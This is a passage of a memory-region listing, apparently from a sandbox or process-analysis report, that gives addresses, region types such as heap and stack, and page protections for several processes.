stack
page read and write
2546B798000
heap
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
2546BC50000
heap
page read and write
24593774000
heap
page read and write
204E7C81000
heap
page read and write
BF5336E000
stack
page read and write
1BA5AADF000
trusted library allocation
page read and write
204E74AB000
heap
page read and write
2390A080000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
1A8DF8D6000
heap
page execute and read and write
7FF83B951000
trusted library allocation
page read and write
1FBCD428000
trusted library allocation
page read and write
7FF83BAE0000
trusted library allocation
page read and write
7FF83B9E0000
trusted library allocation
page read and write
2390A090000
heap
page read and write
1A8DDAD0000
heap
page read and write
1C4D0828000
heap
page read and write
1ECD45C5000
heap
page read and write
7FF83BAF0000
trusted library allocation
page read and write
BF5478D000
stack
page read and write
2546B76C000
heap
page read and write
1A7C4900000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
204E7F7F000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
204E74B5000
heap
page read and write
2178CBC9000
heap
page read and write
1C4CFFE7000
heap
page read and write
1ECD5F44000
heap
page read and write
2546BC52000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1A7C6C47000
heap
page read and write
1C4D0058000
heap
page read and write
1AA51C77000
trusted library allocation
page read and write
1009BF000
stack
page read and write
7FF83BA20000
trusted library allocation
page read and write
245938D3000
heap
page read and write
7FF83B840000
trusted library allocation
page read and write
1FBE546D000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
1A8DDCE4000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
204E74C5000
heap
page read and write
1A8E16E7000
trusted library allocation
page read and write
2546B769000
heap
page read and write
1C4CFFE7000
heap
page read and write
204E7C87000
heap
page read and write
1C4CFFDD000
heap
page read and write
1EF4FEA0000
trusted library allocation
page read and write
204E746B000
heap
page read and write
24593648000
heap
page read and write
189FDF30000
trusted library allocation
page read and write
7FF83B880000
trusted library allocation
page execute and read and write
2D4A5BA000
stack
page read and write
174D2E40000
heap
page read and write
1C4D0117000
heap
page read and write
2D4A4B7000
stack
page read and write
1BA5ABDA000
trusted library allocation
page read and write
1C4D0054000
heap
page read and write
2546B7A1000
heap
page read and write
174D3020000
heap
page read and write
204E7A83000
heap
page read and write
24593A6A000
heap
page read and write
204E7468000
heap
page read and write
7FF83B9F0000
trusted library allocation
page read and write
24593AA5000
heap
page read and write
2546BC23000
heap
page read and write
7FF83B941000
trusted library allocation
page read and write
2390A0D0000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
1EF6A240000
heap
page read and write
24593A48000
heap
page read and write
1EF4FD81000
heap
page read and write
F5096FF000
stack
page read and write
1C4CFFE9000
heap
page read and write
F5092F5000
stack
page read and write
1ECD6450000
heap
page execute and read and write
2178E490000
trusted library allocation
page read and write
139D8E00000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
1C4D0058000
heap
page read and write
7FF83BB40000
trusted library allocation
page read and write
1C4D04FE000
heap
page read and write
174ECE2B000
heap
page read and write
1FBE54E0000
heap
page read and write
1BA72C53000
heap
page read and write
2390A14C000
heap
page read and write
7FF83B930000
trusted library allocation
page read and write
2459363A000
heap
page read and write
1BA72CF9000
heap
page read and write
1C4CE17E000
heap
page read and write
5768EFF000
stack
page read and write
1A7C67DD000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
189FDF10000
heap
page execute and read and write
7FF83BAA0000
trusted library allocation
page read and write
7FF83B846000
trusted library allocation
page read and write
2546B7B8000
heap
page read and write
2103F2A5000
trusted library allocation
page read and write
561727D000
stack
page read and write
1EF61C71000
trusted library allocation
page read and write
1BA58DC0000
heap
page read and write
1BA72C7C000
heap
page read and write
24593A00000
heap
page read and write
7FF83BA60000
trusted library allocation
page read and write
56674FE000
stack
page read and write
189FC140000
trusted library allocation
page read and write
1C4D04CF000
heap
page read and write
2546BA36000
heap
page read and write
7FF83B876000
trusted library allocation
page read and write
25469976000
heap
page read and write
B9A653B000
stack
page read and write
85F43FE000
stack
page read and write
2178EA16000
trusted library allocation
page read and write
2546B74C000
heap
page read and write
1C4D04FE000
heap
page read and write
B9A64BE000
stack
page read and write
7FF83B9A2000
trusted library allocation
page read and write
7FF83B856000
trusted library allocation
page read and write
2546B75C000
heap
page read and write
7FF83B7AD000
trusted library allocation
page execute and read and write
91B107F000
stack
page read and write
2178CC35000
heap
page read and write
1A7C49DF000
heap
page read and write
1C4CE1C0000
heap
page read and write
1C4D0112000
heap
page read and write
245935D1000
heap
page read and write
174D2EA0000
heap
page read and write
1FBCB322000
heap
page read and write
1EF69E7B000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
24593A6B000
heap
page read and write
7FF83B962000
trusted library allocation
page read and write
2390B9D0000
trusted library allocation
page read and write
174ECED0000
heap
page read and write
7FF83B980000
trusted library allocation
page execute and read and write
139D8A88000
heap
page read and write
24593D16000
heap
page read and write
24593777000
heap
page read and write
7FF83BA40000
trusted library allocation
page read and write
7FF83B7C4000
trusted library allocation
page read and write
139D8A3E000
heap
page read and write
1FBCD693000
trusted library allocation
page read and write
1A8DF920000
heap
page read and write
1EF4FC20000
heap
page read and write
1C4D07C8000
heap
page read and write
1A8E16E2000
trusted library allocation
page read and write
24591790000
heap
page read and write
7FF7A1980000
unkown
page write copy
D012FE000
stack
page read and write
2546B77C000
heap
page read and write
2546BC44000
heap
page read and write
174ED2F0000
heap
page read and write
2DB32BA3000
trusted library allocation
page read and write
1FBCD3EA000
trusted library allocation
page read and write
24593D6A000
heap
page read and write
2D4A43E000
stack
page read and write
204E7C84000
heap
page read and write
1A8E10D3000
trusted library allocation
page read and write
117E6FF000
stack
page read and write
BF5377E000
stack
page read and write
204E7477000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
1C4CE20C000
heap
page read and write
1EF69D90000
heap
page read and write
245938C4000
heap
page read and write
24593619000
heap
page read and write
1AA698C0000
heap
page read and write
1A7C6C34000
heap
page read and write
1A7C6C6E000
heap
page read and write
204E7470000
heap
page read and write
1A8E10E1000
trusted library allocation
page read and write
2D4A2FE000
stack
page read and write
7FF83B97A000
trusted library allocation
page read and write
1A7C67E0000
heap
page read and write
1C4CE4E0000
heap
page read and write
189FBFEA000
heap
page read and write
245936E0000
remote allocation
page read and write
204E7F77000
heap
page read and write
1ECEEAF0000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
B9A61BE000
stack
page read and write
174ECE49000
heap
page read and write
2459176A000
heap
page read and write
2080E110000
heap
page read and write
24593A8A000
heap
page read and write
24593648000
heap
page read and write
883C73E000
stack
page read and write
2DB32620000
heap
page execute and read and write
20828180000
heap
page read and write
1C4D04C3000
heap
page read and write
174D2E30000
trusted library allocation
page read and write
1C4CE226000
heap
page read and write
1FBCD3E0000
trusted library allocation
page read and write
1A7C4925000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
7FF83BA50000
trusted library allocation
page read and write
2178EBCD000
trusted library allocation
page read and write
24593A6B000
heap
page read and write
2546BC27000
heap
page read and write
2390A191000
heap
page read and write
7FF83B941000
trusted library allocation
page read and write
7FF83B9D0000
trusted library allocation
page read and write
7FF83B7A3000
trusted library allocation
page execute and read and write
245935D4000
heap
page read and write
1C4CE199000
heap
page read and write
24591770000
heap
page read and write
2DB3082A000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
217A6AF1000
heap
page read and write
204E7F85000
heap
page read and write
1C4CE1AF000
heap
page read and write
9FC3E7E000
stack
page read and write
7FF7A1982000
unkown
page read and write
7FF83B793000
trusted library allocation
page execute and read and write
204E7CAE000
heap
page read and write
7FF83B7D3000
trusted library allocation
page execute and read and write
245917A3000
heap
page read and write
245916FD000
heap
page read and write
2DB30851000
heap
page read and write
1FBCD2EB000
trusted library allocation
page read and write
100737000
stack
page read and write
7FF83B974000
trusted library allocation
page read and write
5399E7D000
stack
page read and write
1ECD6837000
trusted library allocation
page read and write
2546B766000
heap
page read and write
1BA5A610000
heap
page readonly
2178E4C0000
heap
page readonly
2103BD2F000
heap
page read and write
56177BE000
stack
page read and write
7FF83BA40000
trusted library allocation
page read and write
7FF83B932000
trusted library allocation
page read and write
1BA58D10000
heap
page read and write
20827D20000
heap
page read and write
7FF83B8E0000
trusted library allocation
page execute and read and write
18C00001000
trusted library allocation
page read and write
7FF83B971000
trusted library allocation
page read and write
7FF83B9B0000
trusted library allocation
page execute and read and write
BF53BBF000
stack
page read and write
1A7C6C47000
heap
page read and write
2178E530000
heap
page read and write
7FF83B9B0000
trusted library allocation
page read and write
2179E9A1000
trusted library allocation
page read and write
2080DE88000
heap
page read and write
7FF83B971000
trusted library allocation
page read and write
217A6AFB000
heap
page read and write
883C578000
stack
page read and write
24593A7E000
heap
page read and write
7FF83B876000
trusted library allocation
page execute and read and write
18980013000
trusted library allocation
page read and write
139D8A88000
heap
page read and write
7FF83B990000
trusted library allocation
page read and write
21790053000
trusted library allocation
page read and write
7FF83BA40000
trusted library allocation
page read and write
189FE160000
heap
page read and write
2390B9E0000
heap
page readonly
1C4D07C1000
heap
page read and write
100A3B000
stack
page read and write
2390C000000
trusted library allocation
page read and write
7FF83B81C000
trusted library allocation
page execute and read and write
204E7C85000
heap
page read and write
139D8A86000
heap
page read and write
174E4B20000
trusted library allocation
page read and write
1A7C6C4B000
heap
page read and write
7FF83B880000
trusted library allocation
page execute and read and write
1C4D03D0000
remote allocation
page read and write
56172FF000
stack
page read and write
24593A45000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
1A8F7B20000
heap
page read and write
139D8A1C000
heap
page read and write
2459172C000
heap
page read and write
21055D0D000
heap
page read and write
7FF83BA70000
trusted library allocation
page read and write
1A7C6855000
heap
page read and write
7FF83B972000
trusted library allocation
page read and write
1C4D04BF000
heap
page read and write
1A7C6800000
heap
page read and write
1C4D04EF000
heap
page read and write
7FF83B88E000
trusted library allocation
page execute and read and write
7FF7A1984000
unkown
page readonly
2103BCA0000
heap
page read and write
189804C0000
trusted library allocation
page read and write
2546BB30000
remote allocation
page read and write
91B163E000
stack
page read and write
204E7FA3000
heap
page read and write
1A7C49BC000
heap
page read and write
1C4D0488000
heap
page read and write
7FF83B9B0000
trusted library allocation
page execute and read and write
1A7C67D4000
heap
page read and write
24593644000
heap
page read and write
2390A14A000
heap
page read and write
1C4D07D0000
heap
page read and write
24593D11000
heap
page read and write
7FF83B7A2000
trusted library allocation
page read and write
245919CE000
heap
page read and write
7FF83BAE4000
trusted library allocation
page read and write
1C4D07D8000
heap
page read and write
7FF83B960000
trusted library allocation
page execute and read and write
7FF83BB10000
trusted library allocation
page execute and read and write
208281B4000
heap
page read and write
1C4CE1E2000
heap
page read and write
245939DC000
heap
page read and write
1AA69800000
heap
page read and write
7FF83B9B2000
trusted library allocation
page read and write
7FF83B983000
trusted library allocation
page execute and read and write
254698F1000
heap
page read and write
5399A7E000
stack
page read and write
1C4D02A6000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
24593A85000
heap
page read and write
1AA4F8C5000
heap
page read and write
B9A643E000
stack
page read and write
204E74C5000
heap
page read and write
23924380000
heap
page read and write
174E4B5C000
trusted library allocation
page read and write
1C4D04CE000
heap
page read and write
24593777000
heap
page read and write
1A8EFBC7000
trusted library allocation
page read and write
7FF83B990000
trusted library allocation
page read and write
1C4D02B2000
heap
page read and write
24591734000
heap
page read and write
7FF83B876000
trusted library allocation
page execute and read and write
2DB32215000
heap
page read and write
2DB4AAA0000
heap
page execute and read and write
1BA5A600000
trusted library allocation
page read and write
7FF83BA70000
trusted library allocation
page read and write
1A7C49BC000
heap
page read and write
1A7C6A71000
heap
page read and write
18C71CF6000
heap
page execute and read and write
7FF83B7D4000
trusted library allocation
page read and write
7FF83B7B0000
trusted library allocation
page read and write
24593AA9000
heap
page read and write
1EF69F80000
heap
page read and write
2390A156000
heap
page read and write
1A7C67E5000
heap
page read and write
1AA51DE8000
trusted library allocation
page read and write
24591770000
heap
page read and write
5666F13000
stack
page read and write
7FF83BAC0000
trusted library allocation
page read and write
18C71EBC000
heap
page read and write
1C4D02B2000
heap
page read and write
2105618F000
heap
page read and write
174E4B88000
trusted library allocation
page read and write
7FF83B9DB000
trusted library allocation
page read and write
217A6DA0000
heap
page read and write
24593A45000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
189FC110000
trusted library allocation
page read and write
7FF83B9D0000
trusted library allocation
page read and write
1C4D084B000
heap
page read and write
1C4CE1E8000
heap
page read and write
2546BC36000
heap
page read and write
1FBCD3D7000
trusted library allocation
page read and write
1EF69DDB000
heap
page read and write
174E4B43000
trusted library allocation
page read and write
1A7C6A71000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
1ECD6787000
trusted library allocation
page read and write
1A8DDB7C000
heap
page read and write
1ECEE56F000
heap
page read and write
7FF83B7C3000
trusted library allocation
page execute and read and write
7FF83BAA0000
trusted library allocation
page read and write
1C4D03D0000
remote allocation
page read and write
208113A4000
trusted library allocation
page read and write
21056140000
heap
page read and write
2080DD90000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1C4D0091000
heap
page read and write
21790077000
trusted library allocation
page read and write
2103BDC7000
heap
page read and write
1C4D0001000
heap
page read and write
955AF9F000
stack
page read and write
174ECE77000
heap
page read and write
7FF83B850000
trusted library allocation
page execute and read and write
18980049000
trusted library allocation
page read and write
24593D00000
heap
page read and write
1C4D0469000
heap
page read and write
1AA518BF000
trusted library allocation
page read and write
189FE1A2000
heap
page read and write
24593A75000
heap
page read and write
18C10001000
trusted library allocation
page read and write
1EF69C79000
heap
page read and write
1BA72C5A000
heap
page read and write
9FC3B79000
stack
page read and write
1FBCD2D1000
trusted library allocation
page read and write
24593770000
heap
page read and write
18C6FD44000
heap
page read and write
1AA69990000
heap
page read and write
1C4D0011000
heap
page read and write
7FF83B7D0000
trusted library allocation
page read and write
18C6FE50000
heap
page read and write
B9A623C000
stack
page read and write
9FC39FF000
stack
page read and write
7FF83B971000
trusted library allocation
page read and write
1C4D085C000
heap
page read and write
1EF61E2B000
trusted library allocation
page read and write
7FF83BA80000
trusted library allocation
page read and write
1C4D04FE000
heap
page read and write
1A8DDD80000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
1C4CE1E8000
heap
page read and write
20827E26000
heap
page execute and read and write
1ECEE782000
heap
page read and write
18C71EAE000
heap
page read and write
1C4D0466000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
24593611000
heap
page read and write
7FF83BA80000
trusted library allocation
page read and write
2459175E000
heap
page read and write
98D63FD000
stack
page read and write
2546B78D000
heap
page read and write
24593618000
heap
page read and write
1AA4F889000
heap
page read and write
204E74C5000
heap
page read and write
24593D38000
heap
page read and write
1C4D07DC000
heap
page read and write
1C4D07CC000
heap
page read and write
2104DBC1000
trusted library allocation
page read and write
1A7C683C000
heap
page read and write
18C71BD0000
heap
page read and write
2178E980000
heap
page execute and read and write
7FF83BAC0000
trusted library allocation
page read and write
2459171B000
heap
page read and write
204E7F7A000
heap
page read and write
539970F000
stack
page read and write
7FF83B793000
trusted library allocation
page execute and read and write
7FF83BAE0000
trusted library allocation
page read and write
204E7A83000
heap
page read and write
204E74AC000
heap
page read and write
7FF83B7A0000
trusted library allocation
page read and write
1C4CE1B7000
heap
page read and write
1ECD45CC000
heap
page read and write
204E7B80000
remote allocation
page read and write
2D4A1FD000
stack
page read and write
217905AD000
trusted library allocation
page read and write
5399EFF000
stack
page read and write
1A8F7EE5000
heap
page read and write
57693FE000
stack
page read and write
2178E990000
heap
page read and write
1A7C6A73000
heap
page read and write
1C4D04FB000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
2546BA43000
heap
page read and write
539AB4D000
stack
page read and write
1C4D0114000
heap
page read and write
955B5FE000
stack
page read and write
7FF83B7D3000
trusted library allocation
page execute and read and write
BF5367D000
stack
page read and write
2459176C000
heap
page read and write
1A7C6806000
heap
page read and write
24593A49000
heap
page read and write
1EF69FBD000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
24593631000
heap
page read and write
2546B762000
heap
page read and write
1FBE5860000
heap
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
18C004AF000
trusted library allocation
page read and write
174D4BE1000
trusted library allocation
page read and write
2DB326E0000
heap
page read and write
1FBE55C0000
heap
page read and write
24593A78000
heap
page read and write
91B1538000
stack
page read and write
85F41FE000
stack
page read and write
245939FA000
heap
page read and write
20828190000
heap
page read and write
7FF83B870000
trusted library allocation
page read and write
189FC1FC000
heap
page read and write
7FF83B870000
trusted library allocation
page read and write
1AA518CC000
trusted library allocation
page read and write
24593648000
heap
page read and write
24593270000
heap
page read and write
245938C0000
heap
page read and write
7FF83BABF000
trusted library allocation
page read and write
1ECE64D9000
trusted library allocation
page read and write
1A7C6855000
heap
page read and write
204E7460000
heap
page read and write
7FF83B962000
trusted library allocation
page read and write
1A7C6829000
heap
page read and write
1A7C68F0000
remote allocation
page read and write
1C4D07D5000
heap
page read and write
189FBFDD000
heap
page read and write
1A7C6824000
heap
page read and write
883C4FE000
stack
page read and write
1C4D0001000
heap
page read and write
139D8A88000
heap
page read and write
7FF83BAB0000
trusted library allocation
page read and write
1C4D0461000
heap
page read and write
1ECD43D0000
heap
page read and write
1ECEE5FB000
heap
page read and write
1BA58CCA000
heap
page read and write
2103D700000
heap
page read and write
174ECDB3000
heap
page read and write
2103F28C000
trusted library allocation
page read and write
1A8DDB8E000
heap
page read and write
1FBCB5F0000
heap
page read and write
D0123E000
stack
page read and write
174D2ED8000
heap
page read and write
7FF83B9E0000
trusted library allocation
page read and write
BF53C3E000
stack
page read and write
1EF51AA0000
trusted library allocation
page read and write
1C4D0041000
heap
page read and write
24593648000
heap
page read and write
1C4D04E0000
heap
page read and write
18C008A4000
trusted library allocation
page read and write
1ECD68FA000
trusted library allocation
page read and write
1C4D0058000
heap
page read and write
1C4CE20C000
heap
page read and write
7FF83B87C000
trusted library allocation
page execute and read and write
204E744D000
heap
page read and write
1BA58E45000
heap
page read and write
7FF83BA30000
trusted library allocation
page read and write
24593D6F000
heap
page read and write
2546BC44000
heap
page read and write
2390A060000
heap
page read and write
2546BA52000
heap
page read and write
245935F1000
heap
page read and write
FE1AF3C000
stack
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1A8DDBBA000
heap
page read and write
174D2F40000
heap
page read and write
217904E2000
trusted library allocation
page read and write
1BA5AB80000
trusted library allocation
page read and write
1C4CE1A9000
heap
page read and write
174D4C22000
trusted library allocation
page read and write
2103C060000
heap
page read and write
BF53A3E000
stack
page read and write
1A7C67EB000
heap
page read and write
139D8A3E000
heap
page read and write
1BA5AFEB000
trusted library allocation
page read and write
24593D03000
heap
page read and write
21055DE6000
heap
page execute and read and write
1A7C4C9E000
heap
page read and write
7FF83B7A0000
trusted library allocation
page read and write
204E74C5000
heap
page read and write
7FF83B9B0000
trusted library allocation
page execute and read and write
24593A86000
heap
page read and write
7FF83BA50000
trusted library allocation
page read and write
1FBCB670000
heap
page read and write
189FDF50000
heap
page execute and read and write
189FC1F5000
heap
page read and write
7FF83B950000
trusted library allocation
page execute and read and write
1EF69FC3000
heap
page read and write
1EF4FD00000
heap
page read and write
2080F7B6000
heap
page read and write
1FBCD96B000
trusted library allocation
page read and write
7FF83B880000
trusted library allocation
page execute and read and write
1FBCB595000
heap
page read and write
245916F0000
heap
page read and write
18C10011000
trusted library allocation
page read and write
2546B759000
heap
page read and write
245935E3000
heap
page read and write
7FF83BB10000
trusted library allocation
page read and write
174D4C1C000
trusted library allocation
page read and write
2178E9E4000
trusted library allocation
page read and write
5399FFE000
stack
page read and write
1A7C6808000
heap
page read and write
204E74C5000
heap
page read and write
139D8A3B000
heap
page read and write
1C4D004F000
heap
page read and write
245938C6000
heap
page read and write
7FF7A18DA000
unkown
page readonly
24593D50000
heap
page read and write
1C4D04AB000
heap
page read and write
1EF53859000
trusted library allocation
page read and write
7FF83BA20000
trusted library allocation
page read and write
1C4CFFF5000
heap
page read and write
7FF7A1781000
unkown
page execute read
204E7C93000
heap
page read and write
1A7C6829000
heap
page read and write
1A7C6F35000
heap
page read and write
1AA698AB000
heap
page read and write
2459172E000
heap
page read and write
2080DDB0000
heap
page read and write
208112E3000
trusted library allocation
page read and write
1C4D07C1000
heap
page read and write
1898047B000
trusted library allocation
page read and write
7FF83BA50000
trusted library allocation
page read and write
245935E9000
heap
page read and write
5617072000
stack
page read and write
7FF83BAC0000
trusted library allocation
page read and write
7FF83BA30000
trusted library allocation
page read and write
2546BC3F000
heap
page read and write
883C3FE000
stack
page read and write
1A7C4937000
heap
page read and write
98D68FC000
stack
page read and write
204E74AF000
heap
page read and write
204E7453000
heap
page read and write
1C4CFFEC000
heap
page read and write
24593AAA000
heap
page read and write
245935F4000
heap
page read and write
9FC3BF8000
stack
page read and write
1AA51464000
heap
page read and write
1C4D011A000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
1C4D04F5000
heap
page read and write
1A8DF8E0000
heap
page execute and read and write
7FF83BAE0000
trusted library allocation
page read and write
1C4CE1EC000
heap
page read and write
7FF83B850000
trusted library allocation
page execute and read and write
2178CB40000
heap
page read and write
7FF83BA10000
trusted library allocation
page read and write
24593AAA000
heap
page read and write
7FF83B981000
trusted library allocation
page read and write
1EF51B67000
heap
page execute and read and write
1C4CFFF9000
heap
page read and write
2178EA12000
trusted library allocation
page read and write
1BA5AA81000
trusted library allocation
page read and write
2DB307C0000
heap
page read and write
18C003D0000
trusted library allocation
page read and write
FE1AA7F000
stack
page read and write
18C00011000
trusted library allocation
page read and write
2DB32570000
heap
page readonly
139D8A5D000
heap
page read and write
245935FC000
heap
page read and write
210561BE000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
2DB327D2000
trusted library allocation
page read and write
2178E4D0000
trusted library allocation
page read and write
2459172F000
heap
page read and write
7FF83B9B0000
trusted library allocation
page read and write
1ECEE5F3000
heap
page read and write
7FF83B860000
trusted library allocation
page execute and read and write
139D8A88000
heap
page read and write
7FF83B840000
trusted library allocation
page read and write
2080FB0B000
heap
page read and write
204E7478000
heap
page read and write
1C4D0466000
heap
page read and write
1C4D07C5000
heap
page read and write
204E7C92000
heap
page read and write
24593D13000
heap
page read and write
7FF83B9D0000
trusted library allocation
page read and write
2546BB81000
heap
page read and write
174ECD50000
heap
page execute and read and write
955B8FB000
stack
page read and write
1ECD6573000
trusted library allocation
page read and write
139D8A3E000
heap
page read and write
1C4D0469000
heap
page read and write
1A7C6C3F000
heap
page read and write
2178CB86000
heap
page read and write
2178CBC4000
heap
page read and write
1AA51DF6000
trusted library allocation
page read and write
7FF83BA20000
trusted library allocation
page read and write
7FF83B941000
trusted library allocation
page read and write
1BA5AEA7000
trusted library allocation
page read and write
1AA4F87F000
heap
page read and write
5668288000
stack
page read and write
955AFDE000
stack
page read and write
24593612000
heap
page read and write
24593D3B000
heap
page read and write
1C4D0014000
heap
page read and write
24593A8D000
heap
page read and write
2DB4A8C3000
heap
page read and write
24593A6B000
heap
page read and write
883D30E000
stack
page read and write
2103BD19000
heap
page read and write
1BA5AA92000
trusted library allocation
page read and write
1A7C67D4000
heap
page read and write
1A7C6B98000
heap
page read and write
B9A6179000
stack
page read and write
1AA518BC000
trusted library allocation
page read and write
24591788000
heap
page read and write
239240F0000
heap
page execute and read and write
7FF83BA40000
trusted library allocation
page read and write
1C4D0058000
heap
page read and write
1C4D07C4000
heap
page read and write
1A7C67FB000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
24593A45000
heap
page read and write
204E7470000
heap
page read and write
1A7C6825000
heap
page read and write
7FF83B942000
trusted library allocation
page read and write
1C4CE17E000
heap
page read and write
1A7C4937000
heap
page read and write
174D2E59000
heap
page read and write
1BA58C90000
heap
page read and write
139D8A86000
heap
page read and write
2DB4A970000
heap
page read and write
7FF83B876000
trusted library allocation
page execute and read and write
7FF83BB00000
trusted library allocation
page read and write
1C4D000C000
heap
page read and write
1A7C6810000
heap
page read and write
7FF83B9A0000
trusted library allocation
page read and write
204E7483000
heap
page read and write
24593AA5000
heap
page read and write
1C4D0400000
heap
page read and write
1EF4FF36000
heap
page read and write
1004FE000
stack
page read and write
217A6AE8000
heap
page read and write
1A8DDB39000
heap
page read and write
1AA69B10000
heap
page read and write
2178CC80000
heap
page read and write
7FF83BA60000
trusted library allocation
page read and write
1A8DDB78000
heap
page read and write
7FF83BAD0000
trusted library allocation
page read and write
18C00040000
trusted library allocation
page read and write
24593AA5000
heap
page read and write
7FF83B84C000
trusted library allocation
page execute and read and write
7FF83BA00000
trusted library allocation
page read and write
189FBFE2000
heap
page read and write
1EF51CFB000
trusted library allocation
page read and write
174D4C19000
trusted library allocation
page read and write
1A7C6A66000
heap
page read and write
7FF83B8C0000
trusted library allocation
page execute and read and write
7FF83B7D4000
trusted library allocation
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
174D4B2B000
trusted library allocation
page read and write
204E745B000
heap
page read and write
1AA51460000
heap
page read and write
1C4D003C000
heap
page read and write
21055DC0000
heap
page execute and read and write
24593D65000
heap
page read and write
18C6FCFE000
heap
page read and write
BF5393F000
stack
page read and write
2DB327ED000
trusted library allocation
page read and write
7FF83BA60000
trusted library allocation
page read and write
189FE057000
heap
page read and write
1C4D0009000
heap
page read and write
7FF83BAD3000
trusted library allocation
page read and write
BF537FE000
stack
page read and write
204E7480000
heap
page read and write
1C4CFFF5000
heap
page read and write
2103DAA0000
trusted library allocation
page read and write
7FF83BA20000
trusted library allocation
page read and write
1EF534FD000
trusted library allocation
page read and write
1EF4FF84000
heap
page read and write
24593681000
heap
page read and write
539A07B000
stack
page read and write
2390C058000
trusted library allocation
page read and write
7FF83BAA0000
trusted library allocation
page read and write
2080DDF0000
heap
page read and write
5399F7E000
stack
page read and write
1FBCD77E000
trusted library allocation
page read and write
7FF7A18DA000
unkown
page readonly
7FF83B9F0000
trusted library allocation
page read and write
1A7C6800000
heap
page read and write
7FF83B9C0000
trusted library allocation
page read and write
1C4D0857000
heap
page read and write
1EF4FED0000
heap
page readonly
2103DAA3000
trusted library allocation
page read and write
24593AA8000
heap
page read and write
7FF83BA90000
trusted library allocation
page read and write
24593D48000
heap
page read and write
1C4CFFD0000
heap
page read and write
7FF83B990000
trusted library allocation
page execute and read and write
1A7C6855000
heap
page read and write
7FF83B881000
trusted library allocation
page execute and read and write
FE1B03E000
stack
page read and write
24593AA8000
heap
page read and write
1EF51B30000
heap
page execute and read and write
2103BEA0000
heap
page read and write
7FF83BAC0000
trusted library allocation
page read and write
BF53B3E000
stack
page read and write
24593AA8000
heap
page read and write
1C4D02B5000
heap
page read and write
20811384000
trusted library allocation
page read and write
139D8AB2000
heap
page read and write
245935EF000
heap
page read and write
24593D1E000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
24593A47000
heap
page read and write
7FF83B950000
trusted library allocation
page execute and read and write
7FF83B7A4000
trusted library allocation
page read and write
1A8DFA11000
trusted library allocation
page read and write
1A7C6C6E000
heap
page read and write
85F3E7E000
stack
page read and write
1C4D003C000
heap
page read and write
1FBCD7DC000
trusted library allocation
page read and write
24593A86000
heap
page read and write
7FF83B7AB000
trusted library allocation
page read and write
174D4B9A000
trusted library allocation
page read and write
7FF83B7CD000
trusted library allocation
page execute and read and write
1C4CE185000
heap
page read and write
189804F8000
trusted library allocation
page read and write
2390BFCD000
trusted library allocation
page read and write
2178CC31000
heap
page read and write
7FF83BA00000
trusted library allocation
page read and write
56176BE000
stack
page read and write
2546B749000
heap
page read and write
204E7488000
heap
page read and write
1A8DFC3D000
trusted library allocation
page read and write
1C4CE1B2000
heap
page read and write
56673FF000
stack
page read and write
7FF83BB40000
trusted library allocation
page execute and read and write
1A8EFA11000
trusted library allocation
page read and write
7FF83B98A000
trusted library allocation
page read and write
7FF83BAA0000
trusted library allocation
page read and write
7FF83BA40000
trusted library allocation
page read and write
2546B761000
heap
page read and write
204E74C5000
heap
page read and write
1ECD6576000
trusted library allocation
page read and write
85F40FE000
stack
page read and write
7FF83BAD0000
trusted library allocation
page read and write
1A7C67F8000
heap
page read and write
1ECD68E7000
trusted library allocation
page read and write
1C4CE1E2000
heap
page read and write
18980532000
trusted library allocation
page read and write
85F3EFF000
stack
page read and write
1BA5AAC5000
trusted library allocation
page read and write
1C4D001C000
heap
page read and write
2103F7F1000
trusted library allocation
page read and write
7FF83B9C0000
trusted library allocation
page execute and read and write
245916F9000
heap
page read and write
1A7C6C23000
heap
page read and write
1C4D0035000
heap
page read and write
245935CD000
heap
page read and write
24593A6B000
heap
page read and write
1EF4FEE0000
trusted library allocation
page read and write
18C005CB000
trusted library allocation
page read and write
24593D4F000
heap
page read and write
1C4CE1BE000
heap
page read and write
1C4D003D000
heap
page read and write
1BA72ECD000
heap
page read and write
2DB3080C000
heap
page read and write
1C4CE171000
heap
page read and write
204E7CAD000
heap
page read and write
2103BCD0000
heap
page read and write
245935D4000
heap
page read and write
2DB4A83A000
heap
page read and write
1FBCB5A0000
heap
page readonly
1C4D0058000
heap
page read and write
1C4D003C000
heap
page read and write
174D2E64000
heap
page read and write
7FF83BAE0000
trusted library allocation
page read and write
245935ED000
heap
page read and write
18C6FD0A000
heap
page read and write
7FF83BAA0000
trusted library allocation
page read and write
217A6DB0000
heap
page read and write
24593A74000
heap
page read and write
1EF69E55000
heap
page read and write
1C4D0483000
heap
page read and write
1C4D07EB000
heap
page read and write
1A8EFCFF000
trusted library allocation
page read and write
FE1B1BC000
stack
page read and write
21055CF1000
heap
page read and write
204E7FA3000
heap
page read and write
254698C0000
heap
page read and write
56174BF000
stack
page read and write
85F437E000
stack
page read and write
1AA4FA80000
heap
page readonly
7FF83B9C0000
trusted library allocation
page read and write
245935D9000
heap
page read and write
2103F1DE000
trusted library allocation
page read and write
1BA6AA81000
trusted library allocation
